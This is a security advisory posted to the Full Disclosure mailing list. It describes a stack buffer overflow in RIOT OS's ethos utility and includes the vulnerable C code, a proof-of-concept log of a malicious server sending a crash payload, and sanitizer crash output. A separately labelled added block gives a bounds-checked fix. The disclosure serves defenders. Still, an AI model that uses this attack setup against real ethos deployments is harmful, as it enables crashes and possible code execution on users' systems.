Message-ID: <CAFmK-GwZ5dymOt2hY-XppCKWjUDu+f70O3GOOPnpeY6h6oE1AQ@mail.gmail.com>
Date: Sat, 10 Jan 2026 00:26:58 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT ethos Serial Frame Parser

A stack-based buffer overflow vulnerability exists in the RIOT OS ethos
utility due to missing bounds checking when processing incoming serial
frame data. The vulnerability occurs in the _handle_char() function, where
incoming frame bytes are appended to a fixed-size stack buffer
(serial->frame) without verifying that the current write index
(serial->framebytes) remains within bounds. An attacker capable of sending
crafted serial or TCP-framed input can cause serial->framebytes to exceed
the buffer size (MTU, 9000 bytes), resulting in a write past the end of the
stack buffer. This condition leads to memory corruption, application crash,
and potentially arbitrary code execution depending on compiler options and
runtime protections.


*Vulnerable Code:*

static void _handle_char(serial_t *serial, char c)
{
    /* no check that serial->framebytes < MTU before the write */
    serial->frame[serial->framebytes] = c;
    serial->framebytes++;
}

*Root Cause:*

* serial->frame is a fixed-size stack buffer (char frame[MTU])
* serial->framebytes is unbounded and attacker-controlled
* No validation against MTU before writing
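As an added illustration of the root cause listed above (this is not code from the advisory or from the RIOT project, and it is not RIOT's actual patch), the following C program shows the same handler with the missing bounds check in place. The `serial_t` layout is a minimal stand-in holding only the two fields the advisory names plus a hypothetical `dropped` counter; `MTU` is the 9000-byte frame size the advisory gives. Feeding it a constructed 9501-byte input (the PoC's payload length) stores exactly MTU bytes and refuses the remaining 501 instead of writing past the end of `frame`.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Frame buffer size named in the advisory (MTU, 9000 bytes). */
#define MTU 9000

/* Minimal stand-in for ethos' serial state: only the two fields the
 * advisory names plus a hypothetical drop counter. Not the real struct. */
typedef struct {
    char frame[MTU];
    size_t framebytes;
    size_t dropped;
} serial_t;

/* Hardened handler (hypothetical, not the project's patch): refuses any
 * write at index >= MTU. Returns true if the byte was stored. */
static bool handle_char_checked(serial_t *serial, char c)
{
    if (serial->framebytes >= MTU) {
        /* Oversized frame: drop the byte and count it so the condition
         * is observable. A real fix would also discard the partial frame
         * and resynchronise on the next frame delimiter. */
        serial->dropped++;
        return false;
    }
    serial->frame[serial->framebytes] = c;
    serial->framebytes++;
    return true;
}

/* Push n bytes through the handler; return how many were accepted. */
size_t feed_bytes(serial_t *serial, const char *buf, size_t n)
{
    size_t accepted = 0;
    for (size_t i = 0; i < n; i++) {
        if (handle_char_checked(serial, buf[i])) {
            accepted++;
        }
    }
    return accepted;
}

/* Constructed input: MTU + 501 bytes, matching the 9501-byte payload
 * length reported in the advisory. Returns the number of bytes accepted. */
size_t demo_oversized_frame(serial_t *serial)
{
    char input[MTU + 501];
    memset(input, 'A', sizeof input);
    memset(serial, 0, sizeof *serial);
    return feed_bytes(serial, input, sizeof input);
}

int main(void)
{
    serial_t s;
    size_t accepted = demo_oversized_frame(&s);
    printf("accepted %zu bytes, dropped %zu, framebytes=%zu (limit %d)\n",
           accepted, s.dropped, s.framebytes, MTU);
    return 0;
}
```

Compiling this with `-fsanitize=address,undefined` and running it produces no sanitizer report, whereas the unchecked version triggers exactly the `index 9000 out of bounds` and `stack-buffer-overflow` output shown later in this post. The check uses `>=` rather than `>` because index MTU is already one past the last valid element of `char frame[MTU]`.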
*Proof of Concept:*

*listener:*
# python3 payload.py

This exploit acts as a MALICIOUS SERVER.
Run ethos like: ./ethos tap0 tcp:127.0.0.1 20000
The exploit will send the payload when ethos connects.


[*] Starting malicious server on 0.0.0.0:20000
[*] Architecture: aarch64
[*] Exploitation mode: crash

[+] Server listening on 0.0.0.0:20000

[!] Waiting for ethos to connect...
[*] Run ethos like this:
  ./ethos tap0 tcp:127.0.0.1 20000

[+] ethos client connected from ('127.0.0.1', 37114)
[*] Generating crash payload...
[+] Crash payload ready: 9501 bytes
[*] Waiting 1 second before sending payload...
[*] Sending malicious payload (9501 bytes)...
[*] Sent 1024/9501 bytes...
[*] Sent 2048/9501 bytes...
[*] Sent 3072/9501 bytes...
[*] Sent 4096/9501 bytes...
[*] Sent 5120/9501 bytes...
[*] Sent 6144/9501 bytes...
[*] Sent 7168/9501 bytes...
[*] Sent 8192/9501 bytes...
[*] Sent 9216/9501 bytes...
[*] Sent 9501/9501 bytes...
[+] Payload sent successfully!
[!] ethos client should crash now (check for ASAN output)
[*] Received response:
b'~}"\x00\x00\x00\x00\x00\x00~~}"\x00\x00\x00\x00\x00\x00~'
[*] Connection from ('127.0.0.1', 37114) closed



*Connection:*
./ethos tap0 tcp:127.0.0.1 20000



*Output:*
----> ethos: sending hello.
----> ethos: activating serial pass through.
ethos.c:186:5: runtime error: index 9000 out of bounds for type 'char[9000]'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ethos.c:186:5
=================================================================
==1375066==ERROR: AddressSanitizer: stack-buffer-overflow on address
0xfbff8f804848 at pc 0xaaaae0b9fad0 bp 0xffffece78420 sp 0xffffece78418
WRITE of size 1 at 0xfbff8f804848 thread T0
    #0 0xaaaae0b9facc in _handle_char
/root/RIOT/dist/tools/ethos/ethos.c:186:39
    #1 0xaaaae0b9ed38 in _serial_handle_byte
/root/RIOT/dist/tools/ethos/ethos.c:216:17
    #2 0xaaaae0b9ed38 in main /root/RIOT/dist/tools/ethos/ethos.c:559:34
    #3 0xffff91162598 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0xffff91162678 in __libc_start_main csu/../csu/libc-start.c:360:3
    #5 0xaaaae0ab67ec in _start (/root/RIOT/dist/tools/ethos/ethos+0x367ec)
(BuildId: 4734887eb4858e961729a4e74b8fbfbd73e74d82)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
